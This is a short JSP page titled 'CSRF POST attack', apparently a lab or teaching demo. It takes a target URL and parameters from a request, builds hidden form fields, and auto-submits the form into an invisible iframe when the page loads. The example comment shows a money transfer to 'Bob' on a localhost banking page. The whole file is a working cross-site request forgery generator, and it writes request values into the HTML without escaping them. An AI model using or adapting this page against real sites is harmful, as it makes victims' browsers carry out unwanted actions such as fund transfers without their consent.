<% 
	// We neet to get the two parameters: action and parameters
	String csrf = request.getParameter("csrf");
	
	// Analyze the csrf value: csrf=http://localhost/transferMoney.jsp?to=Bob|cash=3000  
	String[] values = csrf.split("\\?");
	
	// The first value is the target URL
	String url = values[0];
	
	// The second value is the parameters
	String parameterValues = values[1];
	

%>
<html>
	<head>
		<title>CSRF POST attack</title>
	</head>
	<body>
		<iframe frameborder="0" 
                    name="variframe" 
                    id="variframe" 
                    width="0" 
                    height="0">
            </iframe>
	
		<form id="transferform" 
                  method="post" 
                  target="variframe"    
                  action="<%=url%>">
 <%          	// Split the value with "|" 
	String[] paraValues = parameterValues.split("\\|");
	for(int i = 0; i < paraValues.length; i ++){
		String paraValue = paraValues[i];
		String[] perValue = paraValue.split("\\=");
		String key = perValue[0];
		String value = perValue[1];
 %>
		<input type="hidden" value="<%=value%>"  name="<%=key%>" /> 
 <%
	}  
 %>
		</form>
		
		<script type="text/javascript">  
	         var myform = document.getElementById("transferform");  
	         myform.submit();  
	    </script>
	</body>
</html>
